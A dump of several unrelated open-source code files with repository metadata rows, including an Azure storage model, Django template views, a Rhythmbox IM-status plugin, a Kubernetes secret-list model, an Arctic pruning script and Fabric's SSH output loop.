if action == 'set':
if field_name == 'meeting_names' and self.get('meeting_names'):
self.__setitem__('_first_meeting_name',
self['meeting_names'][0],
exclude=['connect'])
if self['meeting_names'][1:]:
self.__setitem__('_additional_meeting_names',
self['meeting_names'][1:],
exclude=['connect'])
        elif field_name in ('_first_meeting_name',
                            '_additional_meeting_names'):
self.__setitem__(
'meeting_names',
util_merge_fields_info_list(self, ['_first_meeting_name',
'_additional_meeting_names']),
exclude=['connect'])
| gpl-2.0 | -7,320,243,428,681,449,000 | 43.880952 | 93 | 0.605305 | false |
yaqiyang/autorest | src/generator/AutoRest.Python.Azure.Tests/Expected/AcceptanceTests/StorageManagementClient/storagemanagementclient/models/storage_account.py | 4 | 6450 | # coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from .resource import Resource
class StorageAccount(Resource):
"""The storage account.
Variables are only populated by the server, and will be ignored when
sending a request.
:ivar id: Resource Id
:vartype id: str
:ivar name: Resource name
:vartype name: str
:ivar type: Resource type
:vartype type: str
:param location: Resource location
:type location: str
:param tags: Resource tags
:type tags: dict
:param provisioning_state: Gets the status of the storage account at the
time the operation was called. Possible values include: 'Creating',
'ResolvingDNS', 'Succeeded'
:type provisioning_state: str or :class:`ProvisioningState
<fixtures.acceptancetestsstoragemanagementclient.models.ProvisioningState>`
:param account_type: Gets the type of the storage account. Possible
values include: 'Standard_LRS', 'Standard_ZRS', 'Standard_GRS',
'Standard_RAGRS', 'Premium_LRS'
:type account_type: str or :class:`AccountType
<fixtures.acceptancetestsstoragemanagementclient.models.AccountType>`
:param primary_endpoints: Gets the URLs that are used to perform a
retrieval of a public blob, queue or table object.Note that StandardZRS
and PremiumLRS accounts only return the blob endpoint.
:type primary_endpoints: :class:`Endpoints
<fixtures.acceptancetestsstoragemanagementclient.models.Endpoints>`
:param primary_location: Gets the location of the primary for the storage
account.
:type primary_location: str
:param status_of_primary: Gets the status indicating whether the primary
location of the storage account is available or unavailable. Possible
values include: 'Available', 'Unavailable'
:type status_of_primary: str or :class:`AccountStatus
<fixtures.acceptancetestsstoragemanagementclient.models.AccountStatus>`
:param last_geo_failover_time: Gets the timestamp of the most recent
instance of a failover to the secondary location. Only the most recent
timestamp is retained. This element is not returned if there has never
been a failover instance. Only available if the accountType is
StandardGRS or StandardRAGRS.
:type last_geo_failover_time: datetime
:param secondary_location: Gets the location of the geo replicated
secondary for the storage account. Only available if the accountType is
StandardGRS or StandardRAGRS.
:type secondary_location: str
:param status_of_secondary: Gets the status indicating whether the
secondary location of the storage account is available or unavailable.
Only available if the accountType is StandardGRS or StandardRAGRS.
Possible values include: 'Available', 'Unavailable'
:type status_of_secondary: str or :class:`AccountStatus
<fixtures.acceptancetestsstoragemanagementclient.models.AccountStatus>`
:param creation_time: Gets the creation date and time of the storage
account in UTC.
:type creation_time: datetime
:param custom_domain: Gets the user assigned custom domain assigned to
this storage account.
:type custom_domain: :class:`CustomDomain
<fixtures.acceptancetestsstoragemanagementclient.models.CustomDomain>`
:param secondary_endpoints: Gets the URLs that are used to perform a
retrieval of a public blob, queue or table object from the secondary
location of the storage account. Only available if the accountType is
StandardRAGRS.
:type secondary_endpoints: :class:`Endpoints
<fixtures.acceptancetestsstoragemanagementclient.models.Endpoints>`
"""
_validation = {
'id': {'readonly': True},
'name': {'readonly': True},
'type': {'readonly': True},
'location': {'required': True},
}
_attribute_map = {
'id': {'key': 'id', 'type': 'str'},
'name': {'key': 'name', 'type': 'str'},
'type': {'key': 'type', 'type': 'str'},
'location': {'key': 'location', 'type': 'str'},
'tags': {'key': 'tags', 'type': '{str}'},
'provisioning_state': {'key': 'properties.provisioningState', 'type': 'ProvisioningState'},
'account_type': {'key': 'properties.accountType', 'type': 'AccountType'},
'primary_endpoints': {'key': 'properties.primaryEndpoints', 'type': 'Endpoints'},
'primary_location': {'key': 'properties.primaryLocation', 'type': 'str'},
'status_of_primary': {'key': 'properties.statusOfPrimary', 'type': 'AccountStatus'},
'last_geo_failover_time': {'key': 'properties.lastGeoFailoverTime', 'type': 'iso-8601'},
'secondary_location': {'key': 'properties.secondaryLocation', 'type': 'str'},
'status_of_secondary': {'key': 'properties.statusOfSecondary', 'type': 'AccountStatus'},
'creation_time': {'key': 'properties.creationTime', 'type': 'iso-8601'},
'custom_domain': {'key': 'properties.customDomain', 'type': 'CustomDomain'},
'secondary_endpoints': {'key': 'properties.secondaryEndpoints', 'type': 'Endpoints'},
}
def __init__(self, location, tags=None, provisioning_state=None, account_type=None, primary_endpoints=None, primary_location=None, status_of_primary=None, last_geo_failover_time=None, secondary_location=None, status_of_secondary=None, creation_time=None, custom_domain=None, secondary_endpoints=None):
super(StorageAccount, self).__init__(location=location, tags=tags)
self.provisioning_state = provisioning_state
self.account_type = account_type
self.primary_endpoints = primary_endpoints
self.primary_location = primary_location
self.status_of_primary = status_of_primary
self.last_geo_failover_time = last_geo_failover_time
self.secondary_location = secondary_location
self.status_of_secondary = status_of_secondary
self.creation_time = creation_time
self.custom_domain = custom_domain
self.secondary_endpoints = secondary_endpoints
| mit | -2,966,732,839,862,981,000 | 51.439024 | 305 | 0.686512 | false |
minimail/minimail | template_management/views.py | 1 | 3220 | from django.http.response import HttpResponse
from django.views.generic import ListView, DetailView, CreateView, UpdateView,\
DeleteView
from django.urls import reverse_lazy
from django.contrib.auth.decorators import login_required
from django.contrib import messages
from django.contrib.auth.mixins import LoginRequiredMixin
from template_management.models import Template
class TemplateList(LoginRequiredMixin, ListView):
"""TemplateList"""
model = Template
template_name = 'template_list.html'
context_object_name = 'templates'
def get_queryset(self):
return Template.objects.order_by('-created')\
.filter(author=self.request.user)
def get_context_data(self, **kwargs):
context = super(TemplateList, self).get_context_data(**kwargs)
context['public_templates'] = Template.objects.filter(is_public=True)
return context
class TemplateDetail(LoginRequiredMixin, DetailView):
"""TemplateDetail"""
model = Template
template_name = 'template_detail.html'
def get_queryset(self):
return Template.objects.filter(author=self.request.user)
def get_context_data(self, **kwargs):
context = super(TemplateDetail, self).get_context_data(**kwargs)
return context
class TemplateCreate(LoginRequiredMixin, CreateView):
"""TemplateCreate"""
model = Template
fields = ['name', 'html_template', 'text_template', 'placeholders']
template_name = 'template_new.html'
def form_valid(self, form):
form.instance.author = self.request.user
return super(TemplateCreate, self).form_valid(form)
def form_invalid(self, form):
return super(TemplateCreate, self).form_invalid(form)
class TemplateUpdate(LoginRequiredMixin, UpdateView):
"""TemplateUpdate"""
model = Template
fields = ['name', 'html_template', 'text_template', 'placeholders']
template_name = 'template_new.html'
def form_valid(self, form):
form.instance.author = self.request.user
return super(TemplateUpdate, self).form_valid(form)
def get_queryset(self):
return Template.objects.filter(author=self.request.user)
def get_context_data(self, **kwargs):
context = super(TemplateUpdate, self).get_context_data(**kwargs)
return context
class TemplateDelete(LoginRequiredMixin, DeleteView):
"""TemplateDelete"""
model = Template
success_url = reverse_lazy('template-list')
success_message = "The template was deleted successfully."
def delete(self, request, *args, **kwargs):
messages.success(self.request, self.success_message)
return super(TemplateDelete, self).delete(request, *args, **kwargs)
def get_queryset(self):
return Template.objects.filter(author=self.request.user)
def get_context_data(self, **kwargs):
context = super(TemplateDelete, self).get_context_data(**kwargs)
return context
@login_required
def show_template_preview(request, pk):
"""show_template_preview
:param request:
:param pk:
"""
template = Template.objects.get(pk=pk)
return HttpResponse(template.html_template)
| mit | 1,908,705,646,142,656,000 | 31.525253 | 79 | 0.68882 | false |
whausen/part | src/adhocracy/model/tagging.py | 6 | 2477 | from datetime import datetime
import logging
from sqlalchemy import Table, Column, Integer, ForeignKey, DateTime
import meta
log = logging.getLogger(__name__)
tagging_table = Table(
'tagging', meta.data,
Column('id', Integer, primary_key=True),
Column('create_time', DateTime, default=datetime.utcnow),
Column('tag_id', Integer, ForeignKey('tag.id'), nullable=False),
Column('delegateable_id', Integer, ForeignKey('delegateable.id'),
nullable=False),
Column('creator_id', Integer, ForeignKey('user.id'), nullable=False),
)
class Tagging(object):
def __init__(self, delegateable, tag, creator):
self.delegateable = delegateable
self.tag = tag
self.creator = creator
def __repr__(self):
tag = self.tag.name.encode('ascii', 'replace')
return "<Tagging(%s,%s,%s,%s)>" % (self.id, self.delegateable.id,
tag,
self.creator.user_name)
def delete(self):
meta.Session.delete(self)
meta.Session.flush()
@classmethod
def find_by_delegateable_name_creator(cls, delegateable, name, creator):
import adhocracy.lib.text as text
from tag import Tag
name = text.tag_normalize(name)
try:
q = meta.Session.query(Tagging)
q = q.filter(Tagging.creator == creator)
q = q.filter(Tagging.delegateable == delegateable)
q = q.join(Tag)
q = q.filter(Tag.name.like(name))
return q.limit(1).first()
except Exception, e:
log.warn("find_by_delegateable_name_creator(%s): %s" % (id, e))
return None
@classmethod
def find(cls, id, instance_filter=True, include_deleted=False):
q = meta.Session.query(Tagging)
q = q.filter(Tagging.id == id)
# TODO: Instance filtering
return q.limit(1).first()
@classmethod
def create(cls, delegateable, tag, creator):
from tag import Tag
if not isinstance(tag, Tag):
tag = Tag.find_or_create(tag)
tagging = Tagging(delegateable, tag, creator)
meta.Session.add(tagging)
meta.Session.flush()
return tagging
@classmethod
def create_all(cls, delegateable, tags, creator):
import adhocracy.lib.text as text
return [Tagging.create(delegateable, t, creator)
for t in text.tag_split(tags)]
| agpl-3.0 | -8,086,492,964,784,305,000 | 31.168831 | 76 | 0.595882 | false |
christianbecke/rhythmbox-multiple-libraries | plugins/im-status/im-status/__init__.py | 2 | 10273 | # coding: utf-8
# vim: set et sw=2:
#
# Copyright (C) 2007-2008 - Vincent Untz
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2, or (at your option)
# any later version.
#
# The Rhythmbox authors hereby grant permission for non-GPL compatible
# GStreamer plugins to be used and distributed together with GStreamer
# and Rhythmbox. This permission is above and beyond the permissions granted
# by the GPL license by which Rhythmbox is covered. If you modify this code
# you may extend this exception to your version of the code, but you are not
# obligated to do so. If you do not wish to do so, delete this exception
# statement from your version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
import rhythmdb, rb
try:
import dbus
use_gossip = True
use_mc5 = True
use_purple = True
except ImportError:
use_gossip = False
use_mc5 = False
use_purple = False
NORMAL_SONG_ARTIST = 'artist'
NORMAL_SONG_TITLE = 'title'
NORMAL_SONG_ALBUM = 'album'
STREAM_SONG_ARTIST = 'rb:stream-song-artist'
STREAM_SONG_TITLE = 'rb:stream-song-title'
STREAM_SONG_ALBUM = 'rb:stream-song-album'
GOSSIP_BUS_NAME = 'org.gnome.Gossip'
GOSSIP_OBJ_PATH = '/org/gnome/Gossip'
GOSSIP_IFACE_NAME = 'org.gnome.Gossip'
PROPERTIES_IFACE_NAME = 'org.freedesktop.DBus.Properties'
MC5_BUS_NAME = 'org.freedesktop.Telepathy.MissionControl5'
MC5_AM_OBJ_PATH = '/org/freedesktop/Telepathy/AccountManager'
MC5_AM_IFACE_NAME = 'org.freedesktop.Telepathy.AccountManager'
MC5_ACCT_IFACE_NAME = 'org.freedesktop.Telepathy.Account'
PURPLE_BUS_NAME = 'im.pidgin.purple.PurpleService'
PURPLE_OBJ_PATH = '/im/pidgin/purple/PurpleObject'
PURPLE_IFACE_NAME = 'im.pidgin.purple.PurpleInterface'
class IMStatusPlugin (rb.Plugin):
def __init__ (self):
rb.Plugin.__init__ (self)
def activate (self, shell):
self.shell = shell
sp = shell.get_player ()
self.psc_id = sp.connect ('playing-song-changed',
self.playing_entry_changed)
self.pc_id = sp.connect ('playing-changed',
self.playing_changed)
self.pspc_id = sp.connect ('playing-song-property-changed',
self.playing_song_property_changed)
self.current_entry = None
self.current_artist = None
self.current_title = None
self.current_album = None
self.save_status ()
if sp.get_playing ():
self.set_entry (sp.get_playing_entry ())
def deactivate (self, shell):
self.shell = None
sp = shell.get_player ()
sp.disconnect (self.psc_id)
sp.disconnect (self.pc_id)
sp.disconnect (self.pspc_id)
if self.current_entry is not None:
self.restore_status ()
def playing_changed (self, sp, playing):
if playing:
self.set_entry (sp.get_playing_entry ())
else:
self.current_entry = None
self.restore_status ()
def playing_entry_changed (self, sp, entry):
if sp.get_playing ():
self.set_entry (entry)
def playing_song_property_changed (self, sp, uri, property, old, new):
relevant = False
if sp.get_playing () and property in (NORMAL_SONG_ARTIST, STREAM_SONG_ARTIST):
self.current_artist = new
relevant = True
elif sp.get_playing () and property in (NORMAL_SONG_TITLE, STREAM_SONG_TITLE):
self.current_title = new
relevant = True
elif sp.get_playing () and property in (NORMAL_SONG_ALBUM, STREAM_SONG_ALBUM):
self.current_album = new
relevant = True
if relevant:
self.set_status ()
def set_entry (self, entry):
if entry == self.current_entry:
return
if self.current_entry == None:
self.save_status ()
self.current_entry = entry
if entry is None:
self.restore_status ()
return
self.set_status_from_entry ()
def set_status_from_entry (self):
db = self.shell.get_property ("db")
self.current_artist = db.entry_get (self.current_entry, rhythmdb.PROP_ARTIST)
self.current_title = db.entry_get (self.current_entry, rhythmdb.PROP_TITLE)
self.current_album = db.entry_get (self.current_entry, rhythmdb.PROP_ALBUM)
if self.current_entry.get_entry_type().category == rhythmdb.ENTRY_STREAM:
if not self.current_artist:
self.current_artist = db.entry_request_extra_metadata (self.current_entry, STREAM_SONG_ARTIST)
if not self.current_title:
self.current_title = db.entry_request_extra_metadata (self.current_entry, STREAM_SONG_TITLE)
if not self.current_album:
self.current_album = db.entry_request_extra_metadata (self.current_entry, STREAM_SONG_ALBUM)
self.set_status ()
def set_status (self):
subs = {
'artist': self.current_artist,
'album': self.current_album,
'title': self.current_title
}
if self.current_artist:
if self.current_title:
# Translators: do not translate %(artist)s or %(title)s, they are
# string substitution markers (like %s) for the artist and title of
# the current playing song. They can be reordered if necessary.
new_status = _(u"♫ %(artist)s - %(title)s ♫") % subs
elif self.current_album:
# Translators: do not translate %(artist)s or %(album)s, they are
# string substitution markers (like %s) for the artist and album name
# of the current playing song. They can be reordered if necessary.
new_status = _(u"♫ %(artist)s - %(album)s ♫") % subs
elif self.current_album:
# Translators: do not translate %(album)s, it is a string substitution
# marker (like %s) for the album name of the current playing song.
new_status = _(u"♫ %(album)s ♫") % subs
elif self.current_title:
# Translators: do not translate %(title)s, it is a string substitution
# marker (like %s) for the title of the current playing song.
new_status = _(u"♫ %(title)s ♫") % subs
else:
new_status = _(u"♫ Listening to music... ♫")
self.set_gossip_status (new_status)
self.set_mc5_status (new_status)
self.set_purple_status (new_status)
def save_status (self):
self.saved_gossip = self.get_gossip_status ()
self.saved_mc5 = self.get_mc5_status ()
self.saved_purple = self.get_purple_status ()
def restore_status (self):
if self.saved_gossip != None:
self.set_gossip_status (self.saved_gossip)
if self.saved_mc5 != None:
self.set_mc5_status (self.saved_mc5)
if self.saved_purple != None:
self.set_purple_status (self.saved_purple)
def set_gossip_status (self, new_status):
if not use_gossip:
return
try:
bus = dbus.SessionBus ()
gossip_obj = bus.get_object (GOSSIP_BUS_NAME, GOSSIP_OBJ_PATH)
gossip = dbus.Interface (gossip_obj, GOSSIP_IFACE_NAME)
state, status = gossip.GetPresence ("")
gossip.SetPresence (state, new_status)
except dbus.DBusException:
pass
def get_gossip_status (self):
if not use_gossip:
return
try:
bus = dbus.SessionBus ()
gossip_obj = bus.get_object (GOSSIP_BUS_NAME, GOSSIP_OBJ_PATH)
gossip = dbus.Interface (gossip_obj, GOSSIP_IFACE_NAME)
state, status = gossip.GetPresence ("")
return status
except dbus.DBusException:
return None
def set_mc5_status (self, new_status):
if not use_mc5:
return
try:
bus = dbus.SessionBus ()
am_obj = bus.get_object (MC5_BUS_NAME, MC5_AM_OBJ_PATH)
am = dbus.Interface (am_obj, PROPERTIES_IFACE_NAME)
for acct in am.Get (MC5_AM_IFACE_NAME, "ValidAccounts"):
acct_obj = bus.get_object (MC5_BUS_NAME, acct)
acct_iface = dbus.Interface (acct_obj, PROPERTIES_IFACE_NAME)
status = acct_iface.Get (MC5_ACCT_IFACE_NAME, "RequestedPresence")
acct_iface.Set (MC5_ACCT_IFACE_NAME, "RequestedPresence", (status[0], status[1], new_status))
except dbus.DBusException, e:
print "dbus exception while setting status: " + str(e)
def get_mc5_status (self):
if not use_mc5:
return
try:
bus = dbus.SessionBus ()
am_obj = bus.get_object (MC5_BUS_NAME, MC5_AM_OBJ_PATH)
am = dbus.Interface (am_obj, PROPERTIES_IFACE_NAME)
got_status = False
# a bit awful: this just returns the status text from the first account
# that has one.
for acct in am.Get (MC5_AM_IFACE_NAME, "ValidAccounts"):
acct_obj = bus.get_object (MC5_BUS_NAME, acct)
acct_iface = dbus.Interface (acct_obj, PROPERTIES_IFACE_NAME)
status = acct_iface.Get (MC5_ACCT_IFACE_NAME, "RequestedPresence")
got_status = True
if status[2] != "":
return status[2]
# if all accounts have empty status, return that
if got_status:
return ""
except dbus.DBusException, e:
print "dbus exception while getting status: " + str(e)
return None
def set_purple_status (self, new_status):
if not use_purple:
return
try:
bus = dbus.SessionBus ()
purple_obj = bus.get_object (PURPLE_BUS_NAME, PURPLE_OBJ_PATH)
purple = dbus.Interface (purple_obj, PURPLE_IFACE_NAME)
status = purple.PurpleSavedstatusGetCurrent ()
purple.PurpleSavedstatusSetMessage (status, new_status)
purple.PurpleSavedstatusActivate (status)
except dbus.DBusException:
pass
def get_purple_status (self):
if not use_purple:
return
try:
bus = dbus.SessionBus ()
purple_obj = bus.get_object (PURPLE_BUS_NAME, PURPLE_OBJ_PATH)
purple = dbus.Interface (purple_obj, PURPLE_IFACE_NAME)
current = purple.PurpleSavedstatusGetCurrent ()
status = purple.PurpleSavedstatusGetMessage (current)
return status
except dbus.DBusException:
return None
| gpl-2.0 | -6,244,222,777,913,569,000 | 33.40604 | 102 | 0.662538 | false |
eshijia/magnum | magnum/common/pythonk8sclient/swagger_client/models/v1_secret_list.py | 5 | 5135 | # coding: utf-8
"""
Copyright 2015 SmartBear Software
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from pprint import pformat
from six import iteritems
class V1SecretList(object):
"""
NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
"""
def __init__(self):
"""
Swagger model
:param dict swaggerTypes: The key is attribute name
and the value is attribute type.
:param dict attributeMap: The key is attribute name
and the value is json key in definition.
"""
self.swagger_types = {
'kind': 'str',
'api_version': 'str',
'metadata': 'V1ListMeta',
'items': 'list[V1Secret]'
}
self.attribute_map = {
'kind': 'kind',
'api_version': 'apiVersion',
'metadata': 'metadata',
'items': 'items'
}
self._kind = None
self._api_version = None
self._metadata = None
self._items = None
@property
def kind(self):
"""
Gets the kind of this V1SecretList.
kind of object, in CamelCase; cannot be updated; see http://releases.k8s.io/v1.0.4/docs/api-conventions.md#types-kinds
:return: The kind of this V1SecretList.
:rtype: str
"""
return self._kind
@kind.setter
def kind(self, kind):
"""
Sets the kind of this V1SecretList.
kind of object, in CamelCase; cannot be updated; see http://releases.k8s.io/v1.0.4/docs/api-conventions.md#types-kinds
:param kind: The kind of this V1SecretList.
:type: str
"""
self._kind = kind
@property
def api_version(self):
"""
Gets the api_version of this V1SecretList.
version of the schema the object should have; see http://releases.k8s.io/v1.0.4/docs/api-conventions.md#resources
:return: The api_version of this V1SecretList.
:rtype: str
"""
return self._api_version
@api_version.setter
def api_version(self, api_version):
"""
Sets the api_version of this V1SecretList.
version of the schema the object should have; see http://releases.k8s.io/v1.0.4/docs/api-conventions.md#resources
:param api_version: The api_version of this V1SecretList.
:type: str
"""
self._api_version = api_version
@property
def metadata(self):
"""
Gets the metadata of this V1SecretList.
standard list metadata; see http://releases.k8s.io/v1.0.4/docs/api-conventions.md#metadata
:return: The metadata of this V1SecretList.
:rtype: V1ListMeta
"""
return self._metadata
@metadata.setter
def metadata(self, metadata):
"""
Sets the metadata of this V1SecretList.
standard list metadata; see http://releases.k8s.io/v1.0.4/docs/api-conventions.md#metadata
:param metadata: The metadata of this V1SecretList.
:type: V1ListMeta
"""
self._metadata = metadata
@property
def items(self):
"""
Gets the items of this V1SecretList.
items is a list of secret objects; see http://releases.k8s.io/v1.0.4/docs/secrets.md
:return: The items of this V1SecretList.
:rtype: list[V1Secret]
"""
return self._items
@items.setter
def items(self, items):
"""
Sets the items of this V1SecretList.
items is a list of secret objects; see http://releases.k8s.io/v1.0.4/docs/secrets.md
:param items: The items of this V1SecretList.
:type: list[V1Secret]
"""
self._items = items
def to_dict(self):
"""
Return model properties dict
"""
result = {}
for attr, _ in iteritems(self.swagger_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
else:
result[attr] = value
return result
def to_str(self):
"""
Return model properties str
"""
return pformat(self.to_dict())
def __repr__(self):
"""
For `print` and `pprint`
"""
return self.to_str()
| apache-2.0 | -1,367,728,650,382,144,300 | 28.511494 | 126 | 0.576047 | false |
manahl/arctic | arctic/scripts/arctic_prune_versions.py | 1 | 2253 | from __future__ import print_function
import logging
import optparse
import pymongo
from .utils import do_db_auth, setup_logging
from ..arctic import Arctic, ArcticLibraryBinding
from ..hooks import get_mongodb_uri
logger = logging.getLogger(__name__)
def prune_versions(lib, symbols, keep_mins):
logger.info("Fixing snapshot pointers")
lib._cleanup_orphaned_versions(dry_run=False)
for symbol in symbols:
logger.info("Pruning %s" % symbol)
lib._prune_previous_versions(symbol, keep_mins=keep_mins)
def main():
usage = """usage: %prog [options]
Prunes (i.e. deletes) versions of data that are not the most recent, and are older than 10 minutes,
    and are not in use by snapshots. Must be used on an Arctic VersionStore library instance.
Example:
arctic_prune_versions --host=hostname --library=arctic_jblackburn.my_library
"""
setup_logging()
parser = optparse.OptionParser(usage=usage)
parser.add_option("--host", default='localhost', help="Hostname, or clustername. Default: localhost")
parser.add_option("--library", help="The name of the library. e.g. 'arctic_jblackburn.library'")
parser.add_option("--symbols", help="The symbols to prune - comma separated (default all)")
parser.add_option("--keep-mins", default=10, help="Ensure there's a version at least keep-mins old. Default:10")
(opts, _) = parser.parse_args()
if not opts.library:
parser.error('Must specify the Arctic library e.g. arctic_jblackburn.library!')
db_name, _ = ArcticLibraryBinding._parse_db_lib(opts.library)
print("Pruning (old) versions in : %s on mongo %s" % (opts.library, opts.host))
print("Keeping all versions <= %s mins old" % (opts.keep_mins))
c = pymongo.MongoClient(get_mongodb_uri(opts.host))
if not do_db_auth(opts.host, c, db_name):
logger.error('Authentication Failed. Exiting.')
return
lib = Arctic(c)[opts.library]
if opts.symbols:
symbols = opts.symbols.split(',')
else:
symbols = lib.list_symbols(all_symbols=True)
logger.info("Found %s symbols" % len(symbols))
prune_versions(lib, symbols, opts.keep_mins)
logger.info("Done")
if __name__ == '__main__':
main()
| lgpl-2.1 | 2,199,328,562,808,808,400 | 33.136364 | 116 | 0.676875 | false |
bitmonk/fabric | fabric/io.py | 25 | 9677 | from __future__ import with_statement
import sys
import time
import re
import socket
from select import select
from fabric.state import env, output, win32
from fabric.auth import get_password, set_password
import fabric.network
from fabric.network import ssh, normalize
from fabric.utils import RingBuffer
from fabric.exceptions import CommandTimeout
if win32:
import msvcrt
def _endswith(char_list, substring):
tail = char_list[-1 * len(substring):]
substring = list(substring)
return tail == substring
def _has_newline(bytelist):
return '\r' in bytelist or '\n' in bytelist
def output_loop(*args, **kwargs):
OutputLooper(*args, **kwargs).loop()
class OutputLooper(object):
def __init__(self, chan, attr, stream, capture, timeout):
self.chan = chan
self.stream = stream
self.capture = capture
self.timeout = timeout
self.read_func = getattr(chan, attr)
self.prefix = "[%s] %s: " % (
env.host_string,
"out" if attr == 'recv' else "err"
)
self.printing = getattr(output, 'stdout' if (attr == 'recv') else 'stderr')
self.linewise = (env.linewise or env.parallel)
self.reprompt = False
self.read_size = 4096
self.write_buffer = RingBuffer([], maxlen=len(self.prefix))
def _flush(self, text):
self.stream.write(text)
# Actually only flush if not in linewise mode.
# When linewise is set (e.g. in parallel mode) flushing makes
# doubling-up of line prefixes, and other mixed output, more likely.
if not env.linewise:
self.stream.flush()
self.write_buffer.extend(text)
def loop(self):
"""
Loop, reading from <chan>.<attr>(), writing to <stream> and buffering to <capture>.
Will raise `~fabric.exceptions.CommandTimeout` if network timeouts
continue to be seen past the defined ``self.timeout`` threshold.
(Timeouts before then are considered part of normal short-timeout fast
network reading; see Fabric issue #733 for background.)
"""
# Internal capture-buffer-like buffer, used solely for state keeping.
# Unlike 'capture', nothing is ever purged from this.
_buffer = []
# Initialize loop variables
initial_prefix_printed = False
seen_cr = False
line = []
# Allow prefix to be turned off.
if not env.output_prefix:
self.prefix = ""
start = time.time()
while True:
# Handle actual read
try:
bytelist = self.read_func(self.read_size)
except socket.timeout:
elapsed = time.time() - start
if self.timeout is not None and elapsed > self.timeout:
raise CommandTimeout(timeout=self.timeout)
continue
# Empty byte == EOS
if bytelist == '':
# If linewise, ensure we flush any leftovers in the buffer.
if self.linewise and line:
self._flush(self.prefix)
self._flush("".join(line))
break
# A None capture variable implies that we're in open_shell()
if self.capture is None:
# Just print directly -- no prefixes, no capturing, nada
# And since we know we're using a pty in this mode, just go
# straight to stdout.
self._flush(bytelist)
# Otherwise, we're in run/sudo and need to handle capturing and
# prompts.
else:
# Print to user
if self.printing:
printable_bytes = bytelist
# Small state machine to eat \n after \r
if printable_bytes[-1] == "\r":
seen_cr = True
if printable_bytes[0] == "\n" and seen_cr:
printable_bytes = printable_bytes[1:]
seen_cr = False
while _has_newline(printable_bytes) and printable_bytes != "":
# at most 1 split !
cr = re.search("(\r\n|\r|\n)", printable_bytes)
if cr is None:
break
end_of_line = printable_bytes[:cr.start(0)]
printable_bytes = printable_bytes[cr.end(0):]
if not initial_prefix_printed:
self._flush(self.prefix)
if _has_newline(end_of_line):
end_of_line = ''
if self.linewise:
self._flush("".join(line) + end_of_line + "\n")
line = []
else:
self._flush(end_of_line + "\n")
initial_prefix_printed = False
if self.linewise:
line += [printable_bytes]
else:
if not initial_prefix_printed:
self._flush(self.prefix)
initial_prefix_printed = True
self._flush(printable_bytes)
# Now we have handled printing, handle interactivity
read_lines = re.split(r"(\r|\n|\r\n)", bytelist)
for fragment in read_lines:
# Store in capture buffer
self.capture += fragment
# Store in internal buffer
_buffer += fragment
# Handle prompts
expected, response = self._get_prompt_response()
if expected:
del self.capture[-1 * len(expected):]
self.chan.sendall(str(response) + '\n')
else:
prompt = _endswith(self.capture, env.sudo_prompt)
try_again = (_endswith(self.capture, env.again_prompt + '\n')
or _endswith(self.capture, env.again_prompt + '\r\n'))
if prompt:
self.prompt()
elif try_again:
self.try_again()
# Print trailing new line if the last thing we printed was our line
# prefix.
if self.prefix and "".join(self.write_buffer) == self.prefix:
self._flush('\n')
def prompt(self):
# Obtain cached password, if any
password = get_password(*normalize(env.host_string))
# Remove the prompt itself from the capture buffer. This is
# backwards compatible with Fabric 0.9.x behavior; the user
# will still see the prompt on their screen (no way to avoid
# this) but at least it won't clutter up the captured text.
del self.capture[-1 * len(env.sudo_prompt):]
# If the password we just tried was bad, prompt the user again.
if (not password) or self.reprompt:
# Print the prompt and/or the "try again" notice if
# output is being hidden. In other words, since we need
# the user's input, they need to see why we're
# prompting them.
if not self.printing:
self._flush(self.prefix)
if self.reprompt:
self._flush(env.again_prompt + '\n' + self.prefix)
self._flush(env.sudo_prompt)
# Prompt for, and store, password. Give empty prompt so the
# initial display "hides" just after the actually-displayed
# prompt from the remote end.
self.chan.input_enabled = False
password = fabric.network.prompt_for_password(
prompt=" ", no_colon=True, stream=self.stream
)
self.chan.input_enabled = True
# Update env.password, env.passwords if necessary
user, host, port = normalize(env.host_string)
set_password(user, host, port, password)
# Reset reprompt flag
self.reprompt = False
# Send current password down the pipe
self.chan.sendall(password + '\n')
def try_again(self):
# Remove text from capture buffer
self.capture = self.capture[:len(env.again_prompt)]
# Set state so we re-prompt the user at the next prompt.
self.reprompt = True
def _get_prompt_response(self):
"""
Iterate through the request prompts dict and return the response and
original request if we find a match
"""
for tup in env.prompts.iteritems():
if _endswith(self.capture, tup[0]):
return tup
return None, None
def input_loop(chan, using_pty):
while not chan.exit_status_ready():
if win32:
have_char = msvcrt.kbhit()
else:
r, w, x = select([sys.stdin], [], [], 0.0)
have_char = (r and r[0] == sys.stdin)
if have_char and chan.input_enabled:
# Send all local stdin to remote end's stdin
byte = msvcrt.getch() if win32 else sys.stdin.read(1)
chan.sendall(byte)
# Optionally echo locally, if needed.
if not using_pty and env.echo_stdin:
# Not using fastprint() here -- it prints as 'user'
# output level, don't want it to be accidentally hidden
sys.stdout.write(byte)
sys.stdout.flush()
time.sleep(ssh.io_sleep)
| bsd-2-clause | -2,421,830,554,437,730,300 | 38.823045 | 91 | 0.530226 | false |
umitproject/openmonitor-aggregator | build/django-debug-toolbar/debug_toolbar/panels/template.py | 12 | 5970 | from os.path import normpath
from pprint import pformat
from django import http
from django.conf import settings
from django.template.context import get_standard_processors
from django.test.signals import template_rendered
from django.utils.translation import ugettext_lazy as _
from django.db.models.query import QuerySet
